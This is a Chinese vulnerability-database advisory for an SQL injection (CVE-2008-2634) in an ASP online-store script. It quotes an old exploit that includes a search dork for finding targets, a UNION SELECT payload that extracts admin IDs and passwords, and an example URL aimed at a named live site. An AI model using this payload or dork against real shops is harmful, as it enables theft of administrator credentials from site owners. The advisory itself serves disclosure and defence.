bearriver i-pos_internet_pay_online_store index.asp SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115323 漏洞类型 SQL注入
发布时间 2008-06-01 更新时间 2008-06-09
CVE编号 CVE-2008-2634 CNNVD-ID CNNVD-200806-135
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5717
https://www.securityfocus.com/bid/81328
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-135
|漏洞详情
I-PosInternetPayOnlineStore1.3测试第二版以及之前的版本中的index.asp存在SQL注入漏洞。远程攻击者可以借助item参数,执行任意的SQL指令。
|漏洞EXP
[+] Title : I-Pos Internet Pay Online Store v1.3 Beta <= Remote SQL Injection Vulnerability

==========================================================================================

[+] Author : KnocKout
[+] Special ThanX : Dr.Kacak & Cr@zy-King and CW ALL USERS . . .
[+] Cyber-Warrior.Org

===========================================================================================

S. Name : I-Pos Internet Pay Online Store
Version : 1.3 Beta
Download : http://www.asprehberi.net/Indir.asp?IcerikID=1812&SessionID=358055325
Dork : "Powered by i-pos Storefront"

Attackz;

Http://Localsite.com/path/index.asp?item=[SQL Injection]

Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings

######################################################################################################

# milw0rm.com [2008-06-01]
|受影响的产品
Bearrivernet.Net I-Pos Internet Pay Online Store 1.3 BETA Bearrivernet.Net I-Pos Internet Pay Online Store 1.1 Beta
|参考资料

来源:XF
名称:ipos-item-sql-injection(42786)
链接:http://xforce.iss.net/xforce/xfdb/42786
来源:MILW0RM
名称:5717
链接:http://www.milw0rm.com/exploits/5717Vulnerablesoftwareandversions